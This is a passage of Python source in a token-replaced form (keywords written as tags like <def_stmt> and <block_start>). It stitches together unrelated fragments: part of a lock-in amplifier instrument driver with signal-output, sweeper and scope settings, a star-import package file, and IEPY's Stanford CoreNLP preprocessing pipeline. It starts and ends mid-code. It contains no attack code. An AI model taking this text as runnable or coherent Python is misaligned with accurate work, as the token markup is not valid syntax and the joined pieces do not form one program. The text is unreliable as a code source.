<return>value<block_end><def_stmt>_get_demod_sample self number:int demod_param:str<arrow>float<block_start>log.debug("getting demod %s param %s" number demod_param)<line_sep>mode=2<line_sep>module='demods'<line_sep>setting='sample'<if_stmt>demod_param<not><in>['x' 'y' 'R' 'phi']<block_start><raise>RuntimeError("Invalid demodulator parameter")<block_end>datadict=cast(Dict[Any Any] self._getter(module number mode setting))<line_sep>datadict['R']=np.abs(datadict['x']+1j<times>datadict['y'])<line_sep>datadict['phi']=np.angle(datadict['x']+1j<times>datadict['y'] deg=<true>)<line_sep><return>datadict[demod_param]<block_end><def_stmt>_sigout_setter self number:int mode:int setting:str value:Union[int float] output_mode:Optional[int]=<none><arrow><none><block_start>""" Function to set signal output's settings. A specific setter function is needed as parameters depend on each other and need to be checked and updated accordingly. Args: number: The output channel to use. Either 1 or 2. mode: Indicating whether we are asking for an int (0) or double (1). setting: The module's setting to set. value: The value to set the setting to. output_mode: Some options may take an extra int to indicate which of the 8 demodulators this acts on """<line_sep># convenient reference params=self.parameters<line_sep>amp_val_dict={'Vpk':<lambda>value:value 'Vrms':<lambda>value:value<times>sqrt(2) 'dBm':<lambda>value:10<power>((value-10)/20)}<def_stmt>amp_valid number value<block_start>ampdef_val=params[f"signal_output{number+1}_ampdef"].get()<line_sep>autorange_val=params[f"signal_output{number+1}_autorange"].get()<if_stmt>autorange_val<eq>"ON"<block_start>imp50_val=params[f"signal_output{number+1}_imp50"].get()<line_sep>imp50_dic={"OFF":1.5 "ON":0.75}<line_sep>range_val=imp50_dic[imp50_val]<block_end><else_stmt><block_start>so_range=params[f"signal_output{number+1}_range"].get()<line_sep>range_val=round(so_range 3)<block_end>converter=amp_val_dict[ampdef_val]<if_stmt>-range_val<l>amp_val_dict[ampdef_val](value)<g>range_val<block_start><raise>ValueError('Signal Output:'+' Amplitude {} {} too high for chosen range.'.format(value converter(value)))<block_end><block_end><def_stmt>offset_valid number value<block_start><def_stmt>validate_against_individual value amp_val range_val<block_start>amp_val=round(amp_val 3)<if_stmt>-range_val<l>value+amp_val<g>range_val<block_start><raise>ValueError('Signal Output: Offset too high for '<concat>'chosen range.')<block_end><block_end>range_val=params[f"signal_output{number+1}_range"].get()<line_sep>range_val=round(range_val 3)<if_stmt>'MF'<in>self.props['options']<block_start><for_stmt>i range(1 9)<block_start>amp_val=params[f"signal_output{number+1}_amplitude{i}"].get()<line_sep>validate_against_individual(value amp_val range_val)<block_end><block_end><else_stmt><block_start>amp_val=params[f"signal_output{number+1}_amplitude"].get()<line_sep>validate_against_individual(value amp_val range_val)<block_end><block_end><def_stmt>range_valid number value<block_start>autorange_val=params[f"signal_output{number+1}_autorange"].get()<line_sep>imp50_val=params[f"signal_output{number+1}_imp50"].get()<line_sep>imp50_dic={"OFF":[1.5 0.15] "ON":[0.75 0.075]}<if_stmt>autorange_val<eq>"ON"<block_start><raise>ValueError('Signal Output :'<concat>' Cannot set range as autorange is turned on.')<block_end><if_stmt>value<not><in>imp50_dic[imp50_val]<block_start><raise>ValueError('Signal Output: Choose a valid range:'<concat>'[0.75, 0.075] if imp50 is on, [1.5, 0.15]'<concat>' otherwise.')<block_end><block_end><def_stmt>ampdef_valid number value# check which amplitude definition you can use. # dBm is only possible with 50 Ohm imp ON <block_start>imp50_val=params[f"signal_output{number+1}_imp50"].get()<line_sep>imp50_ampdef_dict={"ON":["Vpk" "Vrms" "dBm"] "OFF":["Vpk" "Vrms"]}<if_stmt>value<not><in>imp50_ampdef_dict[imp50_val]<block_start><raise>ValueError("Signal Output: Choose a valid amplitude "<concat>"definition; ['Vpk','Vrms', 'dBm'] if imp50 is"<concat>" on, ['Vpk','Vrms'] otherwise.")<block_end><block_end>dynamic_validation={'range':range_valid 'ampdef':ampdef_valid 'amplitudes':amp_valid 'offset':offset_valid}<def_stmt>update_range_offset_amp <block_start>range_val=params[f"signal_output{number+1}_range"].get()<line_sep>offset_val=params[f"signal_output{number+1}_offset"].get()<if_stmt>"MF"<in>self.props["options"]<block_start>amps_val=[params[f"signal_output{number+1}_amplitude{output}"].get()<for>output range(1 9)]<block_end><else_stmt><block_start>amps_val=[params['signal_output{}_amplitude'.format(number+1)].get()]<block_end><for_stmt>amp_val amps_val<block_start><if_stmt>-range_val<l>offset_val+amp_val<g>range_val# The GUI would allow higher values but it would clip the signal. <block_start><raise>ValueError('Signal Output: Amplitude and/or '<concat>'offset out of range.')<block_end><block_end><block_end><def_stmt>update_offset <block_start>self.parameters[f"signal_output{number+1}_offset"].get()<block_end><def_stmt>update_amp <block_start><if_stmt>"MF"<in>self.props["options"]<block_start><for_stmt>i range(1 9)<block_start>self.parameters[f"signal_output{number+1}_amplitude{i}"].get()<block_end><block_end><else_stmt><block_start>self.parameters[f"signal_output{number+1}_amplitude"].get()<block_end><block_end><def_stmt>update_range <block_start>self.parameters[f"signal_output{number+1}_autorange"].get()<block_end># parameters which will potentially change other parameters changing_param={'imp50':[update_range_offset_amp update_range] 'autorange':[update_range] 'range':[update_offset update_amp] 'amplitudes':[update_range update_amp] 'offset':[update_range]}<line_sep>setstr=f'/{self.device}/sigouts/{number}/{setting}'<if_stmt>output_mode<is><not><none><block_start>setstr<augadd>f'/{output_mode}'<block_end><if_stmt>setting<in>dynamic_validation<block_start>dynamic_validation[setting](number value)<block_end><if_stmt>mode<eq>0<block_start>self.daq.setInt(setstr value)<block_end><elif_stmt>mode<eq>1<block_start>self.daq.setDouble(setstr value)<block_end><else_stmt><block_start><raise>RuntimeError("Invalid mode supplied")<block_end><if_stmt>setting<in>changing_param<block_start>[f()<for>f changing_param[setting]]<block_end><block_end><def_stmt>_sigout_getter self number:int mode:int setting:str output_mode:Optional[int]=<none><arrow>Union[int float]<block_start>""" Function to query the settings of signal outputs. Specific setter function is needed as parameters depend on each other and need to be checked and updated accordingly. Args: number: mode: Indicating whether we are asking for an int (0) or double (1). setting: The module's setting to set. output_mode: Some options may take an extra int to indicate which of the 8 demodulators this acts on """<line_sep>querystr=f'/{self.device}/sigouts/{number}/{setting}'<if_stmt>output_mode<is><not><none><block_start>querystr<augadd>f'/{output_mode}'<block_end><if_stmt>mode<eq>0<block_start>value=self.daq.getInt(querystr)<block_end><elif_stmt>mode<eq>1<block_start>value=self.daq.getDouble(querystr)<block_end><else_stmt><block_start><raise>RuntimeError("Invalid mode supplied")<block_end><return>value<block_end><def_stmt>_list_nodes self node<block_start>""" Returns a list with all nodes in the sub-tree below the specified node. Args: node (str): Module of which you want to know the parameters. return: list of sub-nodes """<line_sep>node_list=self.daq.getList(f'/{self.device}/{node}/')<line_sep><return>node_list<block_end>@staticmethod<def_stmt>NEPBW_to_timeconstant NEPBW order<block_start>""" Helper function to translate a NEP BW and a filter order to a filter time constant. Meant to be used when calculating sweeper sweep times. Note: precise only to within a few percent. Args: NEPBW (float): The NEP bandwidth in Hz order (int): The filter order Returns: float: The filter time constant in s. """<line_sep>const={1:0.249 2:0.124 3:0.093 4:0.078 5:0.068 6:0.061 7:0.056 8:0.052}<line_sep>tau_c=const[order]/NEPBW<line_sep><return>tau_c<block_end><def_stmt>_get_sweep_time self<block_start>""" get_cmd for the sweeper_sweeptime parameter. Note: this calculation is only an estimate and not precise to more than a few percent. Returns: Union[float, None]: None if the bandwidthcontrol setting is 'auto' (then all bets are off), otherwise a time in seconds. Raises: ValueError: if no signals are added to the sweep """<line_sep># Possible TODO: cut down on the number of instrument # queries. <if_stmt>self._sweeper_signals<eq>[]<block_start><raise>ValueError('No signals selected! Can not find sweep time.')<block_end>mode=self.sweeper_BWmode.get()<line_sep># The effective time constant of the demodulator depends on the # sweeper/bandwidthcontrol setting. # # If this setting is 'current', the largest current # time constant of the involved demodulators is used # # If the setting is 'fixed', the NEP BW specified under # sweep/bandwidth is used. The filter order is needed to convert # the NEP BW to a time constant demods={sig.split('/')[3]<for>sig self._sweeper_signals}<line_sep>rates=[]<for_stmt>demod demods<block_start>rates.append(self._getter('demods' demod 1 'rate'))<block_end>rate=min(rates)<if_stmt>mode<eq>'current'<block_start>tcs=[]<for_stmt>demod demods<block_start>tcs.append(self._getter('demods' demod 1 'timeconstant'))<block_end>tau_c=max(tcs)<block_end><elif_stmt>mode<eq>'fixed'<block_start>order=self.sweeper_order()<line_sep>BW=self.sweeper_BW()<line_sep>tau_c=self.NEPBW_to_timeconstant(BW order)<block_end><elif_stmt>mode<eq>'auto'<block_start><return><none><block_end>settlingtime=max(self.sweeper_settlingtc.get()<times>tau_c self.sweeper_settlingtime.get())<line_sep>averagingtime=max(self.sweeper_averaging_time.get()<times>tau_c<times>rate self.sweeper_averaging_samples.get())/rate<line_sep>time_est=(settlingtime+averagingtime)<times>self.sweeper_samplecount.get()<line_sep><return>time_est<block_end><def_stmt>_sweep_setter self setting value<block_start>""" set_cmd for all sweeper parameters. The value and setting are saved in a dictionary which is read by the Sweep parameter's build_sweep method and only then sent to the instrument. """<line_sep>key='/'.join(setting.split('/')[1:])<line_sep>self._sweepdict[key]=value<line_sep>self.sweep_correctly_built=<false><block_end><def_stmt>_sweep_getter self setting<block_start>""" General get_cmd for sweeper parameters The built-in sweeper.get command returns a dictionary, but we want single values. Args: setting (str): the path used by ZI to describe the setting, e.g. 'sweep/settling/time' """<line_sep># TODO: Should this look up in _sweepdict rather than query the # instrument? returndict=self.sweeper.get(setting)# this is a dict # The dict may have different 'depths' depending on the parameter. # The depth is encoded in the setting string (number of '/') keys=setting.split('/')[1:]<while_stmt>keys<ne>[]<block_start>key=keys.pop(0)<line_sep>returndict=returndict[key]<block_end>rawvalue=returndict<if_stmt>isinstance(rawvalue np.ndarray)<and>len(rawvalue)<eq>1<block_start>value=rawvalue[0]<block_end><elif_stmt>isinstance(rawvalue list)<and>len(rawvalue)<eq>1<block_start>value=rawvalue[0]<block_end><else_stmt><block_start>value=rawvalue<block_end><return>value<block_end><def_stmt>add_signal_to_sweeper self demodulator attribute<block_start>""" Add a signal to the output of the sweeper. When the sweeper sweeps, the signals added to the sweeper are returned. Args: demodulator (int): A number from 1-8 choosing the demodulator. The same demodulator can be chosen several times for different attributes, e.g. demod1 X, demod1 phase attribute (str): The attribute to record, e.g. phase or Y Raises: ValueError: if a demodulator outside the allowed range is selected ValueError: if an attribute not in the list of allowed attributes is selected """<line_sep># TODO: implement all possibly returned attributes valid_attributes=['X' 'Y' 'R' 'phase' 'Xrms' 'Yrms' 'Rrms']<line_sep># Validation <if_stmt>demodulator<not><in>range(1 9)<block_start><raise>ValueError('Can not select demodulator'+f' {demodulator}. Only '+'demodulators 1-8 are available.')<block_end><if_stmt>attribute<not><in>valid_attributes<block_start><raise>ValueError('Can not select attribute:'+'{}. Only the following attributes are'+' available: '+('{}, '<times>len(valid_attributes)).format(*valid_attributes))<block_end># internally, we use strings very similar to the ones used by the # instrument, but with the attribute added, e.g. # '/dev2189/demods/0/sample/X' means X of demodulator 1. signalstring=('/'+self.device+'/demods/{}/sample/{}'.format(demodulator-1 attribute))<if_stmt>signalstring<not><in>self._sweeper_signals<block_start>self._sweeper_signals.append(signalstring)<block_end><block_end><def_stmt>remove_signal_from_sweeper self demodulator attribute<block_start>""" Remove a signal from the output of the sweeper. If the signal has not previously been added, a warning is logged. Args: demodulator (int): A number from 1-8 choosing the demodulator. The same demodulator can be chosen several times for different attributes, e.g. demod1 X, demod1 phase attribute (str): The attribute to record, e.g. phase or Y """<line_sep>signalstring=('/'+self.device+'/demods/{}/sample/{}'.format(demodulator-1 attribute))<if_stmt>signalstring<not><in>self._sweeper_signals<block_start>log.warning(f'Can not remove signal with {attribute} of'+f' demodulator {demodulator}, since it was'+' not previously added.')<block_end><else_stmt><block_start>self._sweeper_signals.remove(signalstring)<block_end><block_end><def_stmt>print_sweeper_settings self<block_start>""" Pretty-print the current settings of the sweeper. If Sweep.build_sweep and Sweep.get are called, the sweep described here will be performed. """<line_sep>print('ACQUISITION')<line_sep>toprint=['sweeper_BWmode' 'sweeper_BW' 'sweeper_order' 'sweeper_averaging_samples' 'sweeper_averaging_time' 'sweeper_settlingtime' 'sweeper_settlingtc']<for_stmt>paramname toprint<block_start>parameter=self.parameters[paramname]<line_sep>print(' {}: {} ({})'.format(parameter.label parameter.get() parameter.unit))<block_end>print('HORISONTAL')<line_sep>toprint=['sweeper_start' 'sweeper_stop' 'sweeper_units' 'sweeper_samplecount' 'sweeper_param' 'sweeper_mode' 'sweeper_timeout']<for_stmt>paramname toprint<block_start>parameter=self.parameters[paramname]<line_sep>print(f' {parameter.label}: {parameter.get()}')<block_end>print('VERTICAL')<line_sep>count=1<for_stmt>signal self._sweeper_signals<block_start>(_ _ _ dm _ attr)=signal.split('/')<line_sep>fmt=(count int(dm)+1 attr)<line_sep>print(' Signal {}: Demodulator {}: {}'.format(*fmt))<line_sep>count<augadd>1<block_end>features=['timeconstant' 'order' 'samplerate']<line_sep>print('DEMODULATORS')<line_sep>demods=[]<for_stmt>signal self._sweeper_signals<block_start>demods.append(int(signal.split('/')[3]))<block_end>demods=set(demods)<for_stmt>dm demods<block_start><for_stmt>feat features<block_start>parameter=self.parameters[f"demod{dm+1:d}_{feat}"]<line_sep>fmt=(dm+1 parameter.label parameter.get() parameter.unit)<line_sep>print(" Demodulator {}: {}: {:.6f} ({})".format(*fmt))<block_end><block_end>print("META")<line_sep>swptime=self.sweeper_sweeptime()<if_stmt>swptime<is><not><none><block_start>print(f' Expected sweep time: {swptime:.1f} (s)')<block_end><else_stmt><block_start>print(' Expected sweep time: N/A in auto mode')<block_end>print(' Sweep timeout: {} ({})'.format(self.sweeper_timeout.get() 's'))<line_sep>ready=self.sweep_correctly_built<line_sep>print(f' Sweep built and ready to execute: {ready}')<block_end><def_stmt>_scope_setter self scopemodule mode setting value<block_start>""" set_cmd for all scope parameters. The value and setting are saved in a dictionary which is read by the Scope parameter's build_scope method and only then sent to the instrument. Args: scopemodule (int): Indicates whether this is a setting of the scopeModule or not. 1: it is a scopeModule setting, 0: it is not. mode (int): Indicates whether we are setting an int or a float. 0: int, 1: float. NOTE: Ignored if scopemodule==1. setting (str): The setting, e.g. 'length'. value (Union[int, float, str]): The value to set. """<line_sep># Because setpoints need to be built self.scope_correctly_built=<false><line_sep># Some parameters are linked to each other in specific ways # Therefore, we need special actions for setting these parameters SRtranslation={'kHz':1e3 'MHz':1e6 'GHz':1e9 'khz':1e3 'Mhz':1e6 'Ghz':1e9}<def_stmt>setlength value# TODO: add validation. The GUI seems to correect this value <block_start>self.daq.setDouble(f'/{self.device}/scopes/0/length' value)<line_sep>SR_str=self.parameters['scope_samplingrate'].get()<line_sep>(number unit)=SR_str.split(' ')<line_sep>SR=float(number)<times>SRtranslation[unit]<line_sep>self.parameters['scope_duration'].cache.set(value/SR)<line_sep>self.daq.setInt(f'/{self.device}/scopes/0/length' value)<block_end><def_stmt>setduration value# TODO: validation? <block_start>SR_str=self.parameters['scope_samplingrate'].get()<line_sep>(number unit)=SR_str.split(' ')<line_sep>SR=float(number)<times>SRtranslation[unit]<line_sep>N=int(np.round(value<times>SR))<line_sep>self.parameters['scope_length'].cache.set(N)<line_sep>self.parameters['scope_duration'].cache.set(value)<line_sep>self.daq.setInt(f'/{self.device}/scopes/0/length' N)<block_end><def_stmt>setholdoffseconds value<block_start>self.parameters['scope_trig_holdoffmode'].set('s')<line_sep>self.daq.setDouble(f'/{self.device}/scopes/0/trigholdoff' value)<block_end><def_stmt>setsamplingrate value# When the sample rate is changed, the number of points of the trace # remains unchanged and the duration changes accordingly <block_start>newSR_str=dict(zip(self._samplingrate_codes.values() self._samplingrate_codes.keys()))[value]<line_sep>(number unit)=newSR_str.split(' ')<line_sep>newSR=float(number)<times>SRtranslation[unit]<line_sep>oldSR_str=self.parameters['scope_samplingrate'].get()<line_sep>(number unit)=oldSR_str.split(' ')<line_sep>oldSR=float(number)<times>SRtranslation[unit]<line_sep>oldduration=self.parameters['scope_duration'].get()<line_sep>newduration=oldduration<times>oldSR/newSR<line_sep>self.parameters['scope_duration'].cache.set(newduration)<line_sep>self.daq.setInt(f'/{self.device}/scopes/0/time' value)<block_end>specialcases={'length':setlength 'duration':setduration 'scope_trig_holdoffseconds':setholdoffseconds 'time':setsamplingrate}<if_stmt>setting<in>specialcases<block_start>specialcases[setting](value)<line_sep>self.daq.sync()<line_sep><return><block_end><else_stmt># We have two different parameter types: those under # /scopes/0/ and those under scopeModule/ <block_start><if_stmt>scopemodule<block_start>self.scope.set(f'scopeModule/{setting}' value)<block_end><elif_stmt>mode<eq>0<block_start>self.daq.setInt('/{}/scopes/0/{}'.format(self.device setting) value)<block_end><elif_stmt>mode<eq>1<block_start>self.daq.setDouble('/{}/scopes/0/{}'.format(self.device setting) value)<block_end><return><block_end><block_end><def_stmt>_scope_getter self setting<block_start>""" get_cmd for scopeModule parameters """<line_sep># There are a few special cases SRtranslation={'kHz':1e3 'MHz':1e6 'GHz':1e9 'khz':1e3 'Mhz':1e6 'Ghz':1e9}<def_stmt>getduration <block_start>SR_str=self.parameters['scope_samplingrate'].get()<line_sep>(number unit)=SR_str.split(' ')<line_sep>SR=float(number)<times>SRtranslation[unit]<line_sep>N=self.parameters['scope_length'].get()<line_sep>duration=N/SR<line_sep><return>duration<block_end>specialcases={'duration':getduration}<if_stmt>setting<in>specialcases<block_start>value=specialcases[setting]()<block_end><else_stmt><block_start>querystr='scopeModule/'+setting<line_sep>returndict=self.scope.get(querystr)<line_sep># The dict may have different 'depths' depending on the parameter. # The depth is encoded in the setting string (number of '/') keys=setting.split('/')<while_stmt>keys<ne>[]<block_start>key=keys.pop(0)<line_sep>returndict=returndict[key]<line_sep>rawvalue=returndict<block_end><if_stmt>isinstance(rawvalue np.ndarray)<and>len(rawvalue)<eq>1<block_start>value=rawvalue[0]<block_end><elif_stmt>isinstance(rawvalue list)<and>len(rawvalue)<eq>1<block_start>value=rawvalue[0]<block_end><else_stmt><block_start>value=rawvalue<block_end><block_end><return>value<block_end>@staticmethod<def_stmt>_convert_to_float frequency<block_start>converter={'hz':'e0' 'khz':'e3' 'mhz':'e6' 'ghz':'e9' 'thz':'e12'}<line_sep>value,suffix=frequency.split(' ')<line_sep><return>float(''.join([value converter[suffix.lower()]]))<block_end><def_stmt>round_to_nearest_sampling_frequency self desired_sampling_rate<block_start>available_frequencies=[1.8e9/2<power>self._samplingrate_codes[freq]<for>freq self._samplingrate_codes.keys()]<line_sep>nearest_frequency=min(available_frequencies key=<lambda>f:abs(math.log(desired_sampling_rate 2)-math.log(f 2)))<line_sep><return>nearest_frequency<block_end><def_stmt>_set_samplingrate_as_float self frequency<block_start>float_samplingrate_map={1.8e9/2<power>v:k<for>k,v self._samplingrate_codes.items()}<line_sep>frequency_as_string=float_samplingrate_map[frequency]<line_sep>self.scope_samplingrate(frequency_as_string)<block_end><def_stmt>_get_samplingrate_as_float self<block_start>frequency=self.scope_samplingrate()<line_sep>correct_frequency=1.8e9/2<power>self._samplingrate_codes[frequency]<line_sep><return>correct_frequency<block_end><def_stmt>close self<block_start>""" Override of the base class' close function """<line_sep>self.scope.unsubscribe(f'/{self.device}/scopes/0/wave')<line_sep>self.scope.clear()<line_sep>self.sweeper.clear()<line_sep>self.daq.disconnect()<line_sep>super().close()<block_end><block_end>
# flake8: noqa: F401 <import_from_stmt>auth *<import_from_stmt>link *<import_from_stmt>misc *<import_from_stmt>user *<line_sep>
<import_from_stmt>collections defaultdict<import_from_stmt>itertools chain groupby<import_stmt>logging<import_stmt>tempfile<import_from_stmt>iepy.preprocess corenlp<import_from_stmt>iepy.preprocess.pipeline BasePreProcessStepRunner PreProcessSteps<import_from_stmt>iepy.preprocess.ner.base FoundEntity<import_from_stmt>iepy.data.models EntityOccurrence GazetteItem<line_sep>logger=logging.getLogger(__name__)<class_stmt>CoreferenceError(Exception)<block_start><pass><block_end><class_stmt>GazetteManager<block_start>_PREFIX="__GAZETTE_"<line_sep># Stanford NER default/native classes NATIVE_CLASSES=['DATE' 'DURATION' 'LOCATION' 'MISC' 'MONEY' 'NUMBER' 'ORDINAL' 'ORGANIZATION' 'PERCENT' 'PERSON' 'SET' 'TIME' ]<def_stmt>__init__ self<block_start>self.gazette_items=list(GazetteItem.objects.all())<line_sep>self._cache_per_kind=defaultdict(list)<block_end><def_stmt>escape_text self text<block_start>text=" ".join("\Q{}\E".format(x)<for>x text.split())<line_sep><return>text<block_end><def_stmt>strip_kind self prefixed_kind<block_start><return>prefixed_kind.split(self._PREFIX 1)[-1]<block_end><def_stmt>was_entry_created_by_gazette self alias kind<block_start><if_stmt>kind.startswith(self._PREFIX)<block_start><return><true><block_end><return>alias<in>self._cache_per_kind[kind]<block_end><def_stmt>generate_stanford_gazettes_file self<block_start>""" Generates the gazettes file if there's any. Returns the filepath in case gazette items where found, else None. Note: the Stanford Coreference annotator, only handles Entities of their native classes. That's why there's some special management of Gazette items of such classes/kinds. As a side effect, populates the internal cache with the gazette-items that will be passed to Stanford with any of their Native classes (Entity Kinds) """<if_stmt><not>self.gazette_items<block_start><return><block_end>overridable_classes=",".join(self.NATIVE_CLASSES)<line_sep>self._cache_per_kind=defaultdict(list)<line_sep>gazette_format="{}\t{}\t{}\n"<line_sep>_,filepath=tempfile.mkstemp()<with_stmt>open(filepath "w")<as>gazette_file<block_start><for_stmt>gazette self.gazette_items<block_start>kname=gazette.kind.name<if_stmt>kname<in>self.NATIVE_CLASSES# kind will not be escaped, but tokens will be stored on cache <block_start>self._cache_per_kind[kname].append(gazette.text)<block_end><else_stmt><block_start>kname="{}{}".format(self._PREFIX kname)<block_end>text=self.escape_text(gazette.text)<line_sep>line=gazette_format.format(text kname overridable_classes)<line_sep>gazette_file.write(line)<block_end><block_end><return>filepath<block_end><block_end><class_stmt>StanfordPreprocess(BasePreProcessStepRunner)<block_start><def_stmt>__init__ self increment_ner=<false><block_start>super().__init__()<line_sep>self.gazette_manager=GazetteManager()<line_sep>gazettes_filepath=self.gazette_manager.generate_stanford_gazettes_file()<line_sep>self.corenlp=corenlp.get_analizer(gazettes_filepath=gazettes_filepath)<line_sep>self.override=<false><line_sep>self.increment_ner=increment_ner<block_end><def_stmt>lemmatization_only self document<block_start>""" Run only the lemmatization """<line_sep># Lemmatization was added after the first so we need to support # that a document has all the steps done but lemmatization analysis=StanfordAnalysis(self.corenlp.analyse(document.text))<line_sep>tokens=analysis.get_tokens()<if_stmt>document.tokens<ne>tokens<block_start><raise>ValueError("Document changed since last tokenization, "<concat>"can't add lemmas to it")<block_end>document.set_lemmatization_result(analysis.get_lemmas())<line_sep>document.save()<block_end><def_stmt>syntactic_parsing_only self document<block_start>""" Run only the syntactic parsing """<line_sep># syntactic parsing was added after the first release, so we need to # provide the ability of doing just this on documents that # have all the steps done but syntactic parsing analysis=StanfordAnalysis(self.corenlp.analyse(document.text))<line_sep>parse_trees=analysis.get_parse_trees()<line_sep>document.set_syntactic_parsing_result(parse_trees)<line_sep>document.save()<block_end><def_stmt>increment_ner_only self document<block_start>""" Runs NER steps (basic NER and also Gazetter), adding the new found NE. """<line_sep>analysis=StanfordAnalysis(self.corenlp.analyse(document.text))<line_sep># NER found_entities=analysis.get_found_entities(document.human_identifier self.gazette_manager)<line_sep>document.set_ner_result(found_entities)<line_sep># Save progress so far, next step doesn't modify `document` document.save()<line_sep># Coreference resolution <for_stmt>coref analysis.get_coreferences()<block_start><try_stmt><block_start>apply_coreferences(document coref)<block_end><except_stmt>CoreferenceError<as>e<block_start>logger.warning(e)<block_end><block_end><block_end><def_stmt>__call__ self document<block_start>"""Checks state of the document, and based on the preprocess options, # decides what needs to be run, and triggers it. """<line_sep>steps=[PreProcessSteps.tokenization PreProcessSteps.sentencer PreProcessSteps.tagging PreProcessSteps.ner # Steps added after 0.9.1 PreProcessSteps.lemmatization # Steps added after 0.9.2 PreProcessSteps.syntactic_parsing ]<line_sep>steps_done=set([s<for>s steps<if>document.was_preprocess_step_done(s)])<if_stmt>self.override<or><not>steps_done# no matter what's the internal state of the document, or any other option # on the StanfordPreprocess, everything need to be run <block_start>self.run_everything(document)<block_end><elif_stmt>steps_done<eq>set(steps)# All steps are already done... <block_start><if_stmt>self.increment_ner<block_start>self.increment_ner_only(document)<block_end><block_end><else_stmt># Dealing with accepting "incremental-running" of preprocess for documents # that were preprocessed with some older version of IEPY. # "initial_steps" are the ones added up to version 0.9.1, which (at some point) # were considered "all available steps". <block_start>initial_steps=steps[:4]<line_sep>all_initials_done=set(initial_steps).issubset(steps_done)<if_stmt>all_initials_done<block_start><if_stmt>PreProcessSteps.lemmatization<not><in>steps_done<block_start>self.lemmatization_only(document)<block_end><if_stmt>PreProcessSteps.syntactic_parsing<not><in>steps_done<block_start>self.syntactic_parsing_only(document)<block_end><block_end><else_stmt># weird combination of steps done. We can't handle that right now <block_start><raise>NotImplementedError("Running with mixed preprocess steps not supported, "<concat>"must be 100% StanfordMultiStepRunner")<block_end><block_end><block_end><def_stmt>run_everything self document<block_start>analysis=StanfordAnalysis(self.corenlp.analyse(document.text))<line_sep># Tokenization tokens=analysis.get_tokens()<line_sep>offsets=analysis.get_token_offsets()<line_sep>document.set_tokenization_result(list(zip(offsets tokens)))<line_sep># Lemmatization document.set_lemmatization_result(analysis.get_lemmas())<line_sep># "Sentencing" (splitting in sentences) document.set_sentencer_result(analysis.get_sentence_boundaries())<line_sep># POS tagging document.set_tagging_result(analysis.get_pos())<line_sep># Syntactic parsing document.set_syntactic_parsing_result(analysis.get_parse_trees())<line_sep># NER found_entities=analysis.get_found_entities(document.human_identifier self.gazette_manager)<line_sep>document.set_ner_result(found_entities)<line_sep># Save progress so far, next step doesn't modify `document` document.save()<line_sep># Coreference resolution <for_stmt>coref analysis.get_coreferences()<block_start><try_stmt><block_start>apply_coreferences(document coref)<block_end><except_stmt>CoreferenceError<as>e<block_start>logger.warning(e)<block_end><block_end><block_end><block_end><def_stmt>_dict_path d *steps<block_start>"""Traverses throuth a dict of dicts. Returns always a list. If the object to return is not a list, it's encapsulated in one. If any of the path steps does not exist, an empty list is returned. """<line_sep>x=d<for_stmt>key steps<block_start><try_stmt><block_start>x=x[key]<block_end><except_stmt>KeyError<block_start><return>[]<block_end><block_end><if_stmt><not>isinstance(x list)<block_start>x=[x]<block_end><return>x<block_end><class_stmt>StanfordAnalysis<block_start>"""Helper for extracting the information from stanford corenlp output"""<def_stmt>__init__ self data<block_start>self._data=data<line_sep>self.sentences=self.get_sentences()<line_sep>self._raw_tokens=list(chain.from_iterable(self.sentences))<block_end><def_stmt>_get self *args<block_start><return>_dict_path(self._data *args)<block_end><def_stmt>get_sentences self<block_start>result=[]<line_sep>raw_sentences=self._get("sentences" "sentence")<for_stmt>sentence raw_sentences<block_start>xs=[]<line_sep>tokens=_dict_path(sentence "tokens" "token")<for_stmt>t tokens<block_start>xs.append(t)<block_end>result.append(xs)<block_end><return>result<block_end><def_stmt>get_sentence_boundaries self<block_start>""" Returns a list with the offsets in tokens where each sentence starts, in order. The list contains one extra element at the end containing the total number of tokens. """<line_sep>ys=[0]<for_stmt>x self.sentences<block_start>y=ys[-1]+len(x)<line_sep>ys.append(y)<block_end><return>ys<block_end><def_stmt>get_parse_trees self<block_start>result=[x["parse"]<for>x self._get("sentences" "sentence")]<line_sep><return>result<block_end><def_stmt>get_tokens self<block_start><return>[x["word"]<for>x self._raw_tokens]<block_end><def_stmt>get_lemmas self<block_start><return>[x["lemma"]<for>x self._raw_tokens]<block_end><def_stmt>get_token_offsets self<block_start><return>[int(x["CharacterOffsetBegin"])<for>x self._raw_tokens]<block_end><def_stmt>get_pos self<block_start><return>[x["POS"]<for>x self._raw_tokens]<block_end><def_stmt>get_found_entities self entity_key_prefix gazette_manager=<none><block_start>""" Generates FoundEntity objects for the entities found. For all the entities that came from a gazette, joins the ones with the same kind. """<line_sep>found_entities=[]<line_sep>tokens=self.get_tokens()<for_stmt>i,j,kind self.get_entity_occurrences()<block_start>alias=" ".join(tokens[i:j])<if_stmt>gazette_manager<is><not><none><block_start>from_gazette=gazette_manager.was_entry_created_by_gazette(alias kind)<block_end><else_stmt><block_start>from_gazette=<false><block_end><if_stmt>from_gazette<block_start>kind=gazette_manager.strip_kind(kind)<line_sep>key=alias<block_end><else_stmt><block_start>key="{} {} {} {}".format(entity_key_prefix kind i j)<block_end>found_entities.append(FoundEntity(key=key kind_name=kind alias=alias offset=i offset_end=j from_gazette=from_gazette))<block_end><return>found_entities<block_end><def_stmt>get_entity_occurrences self<block_start>""" Returns a list of tuples (i, j, kind) such that `i` is the start offset of an entity occurrence, `j` is the end offset and `kind` is the entity kind of the entity. """<line_sep>found_entities=[]<line_sep>offset=0<for_stmt>words self.sentences<block_start><for_stmt>kind,group groupby(enumerate(words) key=<lambda>x:x[1]["NER"])<block_start><if_stmt>kind<eq>"O"<block_start><continue><block_end>ix=[i<for>i,word group]<line_sep>i=ix[0]+offset<line_sep>j=ix[-1]+1+offset<line_sep>found_entities.append((i j kind))<block_end>offset<augadd>len(words)<block_end><return>found_entities<block_end><def_stmt>get_coreferences self<block_start>""" Returns a list of lists of tuples (i, j, k) such that `i` is the start offset of a reference, `j` is the end offset and `k` is the index of the head word within the reference. All offsets are in tokens and relative to the start of the document. All references within the same list refer to the same entity. All references in different lists refer to different entities. """<line_sep>sentence_offsets=self.get_sentence_boundaries()<line_sep>coreferences=[]<for_stmt>mention self._get("coreference" "coreference")<block_start>occurrences=[]<line_sep>representative=0<for_stmt>r,occurrence enumerate(_dict_path(mention "mention"))<block_start><if_stmt>"@representative"<in>occurrence<block_start>representative=r<block_end>sentence=int(occurrence["sentence"])-1<line_sep>offset=sentence_offsets[sentence]<line_sep>i=int(occurrence["start"])-1+offset<line_sep>j=int(occurrence["end"])-1+offset<line_sep>k=int(occurrence["head"])-1+offset<line_sep>occurrences.append((i j k))<block_end># Occurrences' representative goes in the first position 